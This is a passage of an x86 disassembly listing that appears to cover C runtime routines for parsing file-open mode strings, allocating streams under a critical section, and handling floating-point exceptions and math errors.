loc_42F8BD: ; CODE XREF: sub_42F84D+4F�j
pop edi
pop esi
retn
sub_42F84D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F8C0 proc near ; CODE XREF: sub_42A40B+1C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_676B14
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_42F8F9
cmp al, 72h
jz short loc_42F8F2
cmp al, 77h
jnz loc_42FA0D
mov ecx, 301h
jmp short loc_42F8FE
; ---------------------------------------------------------------------------
loc_42F8F2: ; CODE XREF: sub_42F8C0+21�j
xor ecx, ecx
or esi, 1
jmp short loc_42F901
; ---------------------------------------------------------------------------
loc_42F8F9: ; CODE XREF: sub_42F8C0+1D�j
mov ecx, 109h
loc_42F8FE: ; CODE XREF: sub_42F8C0+30�j
or esi, 2
loc_42F901: ; CODE XREF: sub_42F8C0+37�j
push 1
pop edx
loc_42F904: ; CODE XREF: sub_42F8C0+8B�j
; sub_42F8C0+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_42F9F3
cmp edx, ebx
jz loc_42F9F3
movsx eax, al
cmp eax, 54h
jg short loc_42F992
jz short loc_42F982
sub eax, 2Bh
jz short loc_42F96C
sub eax, 19h
jz short loc_42F962
sub eax, 0Eh
jz short loc_42F94D
dec eax
jnz loc_42F9E4
cmp [ebp+var_4], ebx
jnz loc_42F9E4
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_42F904
; ---------------------------------------------------------------------------
loc_42F94D: ; CODE XREF: sub_42F8C0+6F�j
cmp [ebp+var_4], ebx
jnz loc_42F9E4
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_42F904
; ---------------------------------------------------------------------------
loc_42F962: ; CODE XREF: sub_42F8C0+6A�j
test cl, 40h
jnz short loc_42F9E4
or ecx, 40h
jmp short loc_42F904
; ---------------------------------------------------------------------------
loc_42F96C: ; CODE XREF: sub_42F8C0+65�j
test cl, 2
jnz short loc_42F9E4
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_42F904
; ---------------------------------------------------------------------------
loc_42F982: ; CODE XREF: sub_42F8C0+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_42F9E4
or ecx, eax
jmp loc_42F904
; ---------------------------------------------------------------------------
loc_42F992: ; CODE XREF: sub_42F8C0+5E�j
sub eax, 62h
jz short loc_42F9DF
dec eax
jz short loc_42F9C8
sub eax, 0Bh
jz short loc_42F9B1
sub eax, 6
jnz short loc_42F9E4
test ch, 0C0h
jnz short loc_42F9E4
or ch, 40h
jmp loc_42F904
; ---------------------------------------------------------------------------
loc_42F9B1: ; CODE XREF: sub_42F8C0+DD�j
cmp [ebp+var_8], ebx
jnz short loc_42F9E4
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_42F904
; ---------------------------------------------------------------------------
loc_42F9C8: ; CODE XREF: sub_42F8C0+D8�j
cmp [ebp+var_8], ebx
jnz short loc_42F9E4
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_42F904
; ---------------------------------------------------------------------------
loc_42F9DF: ; CODE XREF: sub_42F8C0+D5�j
test ch, 0C0h
jz short loc_42F9EB
loc_42F9E4: ; CODE XREF: sub_42F8C0+72�j
; sub_42F8C0+7B�j ...
xor edx, edx
jmp loc_42F904
; ---------------------------------------------------------------------------
loc_42F9EB: ; CODE XREF: sub_42F8C0+122�j
or ch, 80h
jmp loc_42F904
; ---------------------------------------------------------------------------
loc_42F9F3: ; CODE XREF: sub_42F8C0+4A�j
; sub_42F8C0+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_4335E9
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_42FA11
loc_42FA0D: ; CODE XREF: sub_42F8C0+25�j
xor eax, eax
jmp short loc_42FA2B
; ---------------------------------------------------------------------------
loc_42FA11: ; CODE XREF: sub_42F8C0+14B�j
mov eax, [ebp+arg_C]
inc dword_676900
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_42FA2B: ; CODE XREF: sub_42F8C0+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_42F8C0 endp
; =============== S U B R O U T I N E =======================================
sub_42FA30 proc near ; CODE XREF: sub_42A40B+1�p
push ebx
push esi
push edi
push 2
xor ebx, ebx
xor edi, edi
call sub_42DA1F
xor esi, esi
cmp dword_678000, ebx
pop ecx
jle loc_42FAEA
loc_42FA4D: ; CODE XREF: sub_42FA30+57�j
mov eax, dword_676FEC
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_42FA90
test byte ptr [eax+0Ch], 83h
jnz short loc_42FA80
push eax
push esi
call sub_42C133
pop ecx
pop ecx
mov ecx, dword_676FEC
mov eax, [ecx+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_42FA8B
push eax
push esi
call sub_42C185
pop ecx
pop ecx
loc_42FA80: ; CODE XREF: sub_42FA30+2D�j
inc esi
cmp esi, dword_678000
jl short loc_42FA4D
jmp short loc_42FAEA
; ---------------------------------------------------------------------------
loc_42FA8B: ; CODE XREF: sub_42FA30+45�j
mov edi, [ecx+esi*4]
jmp short loc_42FAD4
; ---------------------------------------------------------------------------
loc_42FA90: ; CODE XREF: sub_42FA30+27�j
push 38h
shl esi, 2
call sub_4296E8
pop ecx
mov ecx, dword_676FEC
mov [esi+ecx], eax
mov eax, dword_676FEC
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_42FAEA
add eax, 20h
push eax
call dword_437154 ; InitializeCriticalSection
mov eax, dword_676FEC
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_4370C8 ; RtlEnterCriticalSection
mov eax, dword_676FEC
mov edi, [esi+eax]
loc_42FAD4: ; CODE XREF: sub_42FA30+5E�j
cmp edi, ebx
jz short loc_42FAEA
or dword ptr [edi+10h], 0FFFFFFFFh
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
loc_42FAEA: ; CODE XREF: sub_42FA30+17�j
; sub_42FA30+59�j ...
push 2
call sub_42DA80
pop ecx
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_42FA30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42FAF8(int, double, int)
sub_42FAF8 proc near ; CODE XREF: sub_42A636+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_453B00, 0
jnz short loc_42FB2D
push [ebp+arg_C] ; int
fld [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_4300AE
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42FB2D: ; CODE XREF: sub_42FAF8+A�j
call sub_42F049
push 0FFFFh
mov dword ptr [eax], 21h
push [ebp+arg_C]
call sub_430323
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_42FAF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42FB4C(int, int, double, double, int)
sub_42FB4C proc near ; CODE XREF: sub_42A636:loc_42A6F9�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_42FE97
add esp, 0Ch
test eax, eax
jnz short loc_42FB8A
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_42FBE4
add esp, 18h
loc_42FB8A: ; CODE XREF: sub_42FB4C+1A�j
push [ebp+arg_0]
call sub_430183
cmp dword_453B00, 0
pop ecx
jnz short loc_42FBC8
test eax, eax
jz short loc_42FBC8
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_4300AE
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_42FBC8: ; CODE XREF: sub_42FB4C+4E�j
; sub_42FB4C+52�j
push eax
call sub_430136
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_430323
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_42FB4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FBE4 proc near ; CODE XREF: sub_42FB4C+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_42FC16
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_42FC16: ; CODE XREF: sub_42FBE4+23�j
test cl, 2
jz short loc_42FC29
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_42FC29: ; CODE XREF: sub_42FBE4+35�j
test cl, bl
jz short loc_42FC3B
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_42FC3B: ; CODE XREF: sub_42FBE4+47�j
test cl, 4
jz short loc_42FC4E
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_42FC4E: ; CODE XREF: sub_42FBE4+5A�j
test cl, 8
jz short loc_42FC61
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_42FC61: ; CODE XREF: sub_42FBE4+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_430306
test al, bl
jz short loc_42FCEA
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_42FCEA: ; CODE XREF: sub_42FBE4+FD�j
test al, 4
jz short loc_42FCF5
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_42FCF5: ; CODE XREF: sub_42FBE4+108�j
test al, 8
jz short loc_42FD00
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_42FD00: ; CODE XREF: sub_42FBE4+113�j
test al, 10h
jz short loc_42FD0A
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_42FD0A: ; CODE XREF: sub_42FBE4+11E�j
test al, 20h
jz short loc_42FD14
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_42FD14: ; CODE XREF: sub_42FBE4+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_42FD53
cmp eax, 400h
jz short loc_42FD45
cmp eax, 800h
jz short loc_42FD39
cmp eax, ecx
jnz short loc_42FD59
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_42FD59
; ---------------------------------------------------------------------------
loc_42FD39: ; CODE XREF: sub_42FBE4+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_42FD4F
; ---------------------------------------------------------------------------
loc_42FD45: ; CODE XREF: sub_42FBE4+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_42FD4F: ; CODE XREF: sub_42FBE4+15F�j
mov [eax], ecx
jmp short loc_42FD59
; ---------------------------------------------------------------------------
loc_42FD53: ; CODE XREF: sub_42FBE4+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_42FD59: ; CODE XREF: sub_42FBE4+14B�j
; sub_42FBE4+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_42FD84
cmp eax, 200h
jz short loc_42FD77
cmp eax, ecx
jnz short loc_42FD91
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_42FD91
; ---------------------------------------------------------------------------
loc_42FD77: ; CODE XREF: sub_42FBE4+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_42FD8F
; ---------------------------------------------------------------------------
loc_42FD84: ; CODE XREF: sub_42FBE4+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_42FD8F: ; CODE XREF: sub_42FBE4+19E�j
mov [eax], ecx
loc_42FD91: ; CODE XREF: sub_42FBE4+189�j
; sub_42FBE4+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_430314
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call dword_437230 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_42FE0B
and dword ptr [esi], 0FFFFFFFEh
loc_42FE0B: ; CODE XREF: sub_42FBE4+222�j
test byte ptr [eax+8], 8
jz short loc_42FE14
and dword ptr [esi], 0FFFFFFFBh
loc_42FE14: ; CODE XREF: sub_42FBE4+22B�j
test byte ptr [eax+8], 4
jz short loc_42FE1D
and dword ptr [esi], 0FFFFFFF7h
loc_42FE1D: ; CODE XREF: sub_42FBE4+234�j
test byte ptr [eax+8], 2
jz short loc_42FE26
and dword ptr [esi], 0FFFFFFEFh
loc_42FE26: ; CODE XREF: sub_42FBE4+23D�j
test [eax+8], bl
jz short loc_42FE2E
and dword ptr [esi], 0FFFFFFDFh
loc_42FE2E: ; CODE XREF: sub_42FBE4+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_42FE62
dec ecx
jz short loc_42FE56
dec ecx
jz short loc_42FE4C
dec ecx
jnz short loc_42FE64
or byte ptr [esi+1], 0Ch
jmp short loc_42FE64
; ---------------------------------------------------------------------------
loc_42FE4C: ; CODE XREF: sub_42FBE4+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_42FE5E
; ---------------------------------------------------------------------------
loc_42FE56: ; CODE XREF: sub_42FBE4+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_42FE5E: ; CODE XREF: sub_42FBE4+270�j
mov [esi], ecx
jmp short loc_42FE64
; ---------------------------------------------------------------------------
loc_42FE62: ; CODE XREF: sub_42FBE4+257�j
and [esi], edx
loc_42FE64: ; CODE XREF: sub_42FBE4+260�j
; sub_42FBE4+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_42FE84
dec ecx
jz short loc_42FE7B
dec ecx
jnz short loc_42FE8D
and [esi], edx
jmp short loc_42FE8D
; ---------------------------------------------------------------------------
loc_42FE7B: ; CODE XREF: sub_42FBE4+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_42FE8B
; ---------------------------------------------------------------------------
loc_42FE84: ; CODE XREF: sub_42FBE4+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_42FE8B: ; CODE XREF: sub_42FBE4+29E�j
mov [esi], ecx
loc_42FE8D: ; CODE XREF: sub_42FBE4+291�j
; sub_42FBE4+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42FBE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FE97 proc near ; CODE XREF: sub_42FB4C+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_42FEC2
test byte ptr [ebp+arg_8], bl
jz short loc_42FEC2
push ebx
call sub_430346
pop ecx
and edi, 0FFFFFFF7h
jmp loc_43008C
; ---------------------------------------------------------------------------
loc_42FEC2: ; CODE XREF: sub_42FE97+15�j
; sub_42FE97+1A�j
test al, 4
jz short loc_42FEDC
test byte ptr [ebp+arg_8], 4
jz short loc_42FEDC
push 4
call sub_430346
pop ecx
and edi, 0FFFFFFFBh
jmp loc_43008C
; ---------------------------------------------------------------------------
loc_42FEDC: ; CODE XREF: sub_42FE97+2D�j
; sub_42FE97+33�j
test al, bl
jz loc_42FFB6
test byte ptr [ebp+arg_8], 8
jz loc_42FFB6
push 8
call sub_430346
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_42FF8E
cmp ecx, 400h
jz short loc_42FF66
cmp ecx, 800h
jz short loc_42FF3E
cmp ecx, eax
jnz loc_42FFAE
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_437628
fld dbl_4536C0
fnstsw ax
sahf
ja short loc_42FF36
fchs
loc_42FF36: ; CODE XREF: sub_42FE97+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_42FFAC
; ---------------------------------------------------------------------------
loc_42FF3E: ; CODE XREF: sub_42FE97+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_437628
fnstsw ax
sahf
jbe short loc_42FF56
fld dbl_4536B0
jmp short loc_42FF5E
; ---------------------------------------------------------------------------
loc_42FF56: ; CODE XREF: sub_42FE97+B5�j
fld dbl_4536C0
fchs
loc_42FF5E: ; CODE XREF: sub_42FE97+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_42FFAC
; ---------------------------------------------------------------------------
loc_42FF66: ; CODE XREF: sub_42FE97+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_437628
fnstsw ax
sahf
jbe short loc_42FF7E
fld dbl_4536C0
jmp short loc_42FF86
; ---------------------------------------------------------------------------
loc_42FF7E: ; CODE XREF: sub_42FE97+DD�j
fld dbl_4536B0
fchs
loc_42FF86: ; CODE XREF: sub_42FE97+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_42FFAC
; ---------------------------------------------------------------------------
loc_42FF8E: ; CODE XREF: sub_42FE97+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_437628
fld dbl_4536B0
fnstsw ax
sahf
ja short loc_42FFA6
fchs
loc_42FFA6: ; CODE XREF: sub_42FE97+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_42FFAC: ; CODE XREF: sub_42FE97+A5�j
; sub_42FE97+CD�j ...
fstp qword ptr [ecx]
loc_42FFAE: ; CODE XREF: sub_42FE97+81�j
and edi, 0FFFFFFFEh
jmp loc_43008C
; ---------------------------------------------------------------------------
loc_42FFB6: ; CODE XREF: sub_42FE97+47�j
; sub_42FE97+51�j
test al, 2
jz loc_43008C
test byte ptr [ebp+arg_8], 10h
jz loc_43008C
push esi
xor esi, esi
test al, 10h
jz short loc_42FFD1
mov esi, ebx
loc_42FFD1: ; CODE XREF: sub_42FE97+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp dbl_437628
fnstsw ax
sahf
jz loc_43007A
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_430245
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_43001C
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_430070
; ---------------------------------------------------------------------------
loc_43001C: ; CODE XREF: sub_42FE97+17A�j
fld [ebp+var_C]
fcomp dbl_437628
fnstsw ax
sahf
jnb short loc_43002E
mov edx, ebx
jmp short loc_430030
; ---------------------------------------------------------------------------
loc_43002E: ; CODE XREF: sub_42FE97+191�j
xor edx, edx
loc_430030: ; CODE XREF: sub_42FE97+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_430064
sub eax, ecx
loc_430047: ; CODE XREF: sub_42FE97+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_430052
test esi, esi
jnz short loc_430052
loc_430050: ; DATA XREF: .text:0043AB74�o
mov esi, ebx
loc_430052: ; CODE XREF: sub_42FE97+1B3�j
; sub_42FE97+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_43005E
loc_43005A: ; DATA XREF: .text:off_43BA40�o
; .text:off_43C0B0�o
or byte ptr [ebp+var_C+3], 80h
loc_43005E: ; CODE XREF: sub_42FE97+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_430047
loc_430064: ; CODE XREF: sub_42FE97+1AC�j
test edx, edx
jz short loc_430070
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_430070: ; CODE XREF: sub_42FE97+183�j
; sub_42FE97+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_43007C
; ---------------------------------------------------------------------------
loc_43007A: ; CODE XREF: sub_42FE97+14E�j
mov esi, ebx
loc_43007C: ; CODE XREF: sub_42FE97+1E1�j
test esi, esi
pop esi
jz short loc_430089
push 10h
call sub_430346
pop ecx
loc_430089: ; CODE XREF: sub_42FE97+1E8�j
and edi, 0FFFFFFFDh
loc_43008C: ; CODE XREF: sub_42FE97+26�j
; sub_42FE97+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_4300A3
test byte ptr [ebp+arg_8], 20h
jz short loc_4300A3
push 20h
call sub_430346
pop ecx
and edi, 0FFFFFFEFh
loc_4300A3: ; CODE XREF: sub_42FE97+1F9�j
; sub_42FE97+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_42FE97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4300AE(int, int, int, int, int, int, double, int)
sub_4300AE proc near ; CODE XREF: sub_42FAF8+2B�p
; sub_42FB4C+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_43015E
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_430119
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_430323
lea eax, [ebp+var_20]
push eax
call sub_4338B8
add esp, 0Ch
test eax, eax
jnz short loc_430113
push esi
call sub_430136
pop ecx
loc_430113: ; CODE XREF: sub_4300AE+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_430119: ; CODE XREF: sub_4300AE+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_430323
push [ebp+arg_0]
call sub_430136
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_4300AE endp
; =============== S U B R O U T I N E =======================================
sub_430136 proc near ; CODE XREF: sub_42FB4C+7D�p
; sub_4300AE+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_430152
jle short locret_43015D
cmp eax, 3
jg short locret_43015D
call sub_42F049
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_430152: ; CODE XREF: sub_430136+7�j
call sub_42F049
mov dword ptr [eax], 21h
locret_43015D: ; CODE XREF: sub_430136+9�j
; sub_430136+E�j
retn
sub_430136 endp
; =============== S U B R O U T I N E =======================================
sub_43015E proc near ; CODE XREF: sub_4300AE+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_4535D8
loc_430165: ; CODE XREF: sub_43015E+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_43017B
add eax, 8
inc ecx
cmp eax, offset dbl_4536B0
jl short loc_430165
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_43017B: ; CODE XREF: sub_43015E+D�j
mov eax, off_4535DC[ecx*8]
retn
sub_43015E endp
; =============== S U B R O U T I N E =======================================
sub_430183 proc near ; CODE XREF: sub_42FB4C+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_43018F
push 5
jmp short loc_4301A5
; ---------------------------------------------------------------------------
loc_43018F: ; CODE XREF: sub_430183+6�j
test al, 8
jz short loc_430197
push 1
jmp short loc_4301A5
; ---------------------------------------------------------------------------
loc_430197: ; CODE XREF: sub_430183+E�j
test al, 4
jz short loc_43019F
push 2
jmp short loc_4301A5
; ---------------------------------------------------------------------------
loc_43019F: ; CODE XREF: sub_430183+16�j
test al, 1
jz short loc_4301A7
push 3
loc_4301A5: ; CODE XREF: sub_430183+A�j
; sub_430183+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_4301A7: ; CODE XREF: sub_430183+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_430183 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4301B0(double)
sub_4301B0 proc near ; CODE XREF: sub_42A636:loc_42A6BC�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_4301B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4301C2(double, int)
sub_4301C2 proc near ; CODE XREF: sub_430245+82�p
; sub_430245+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
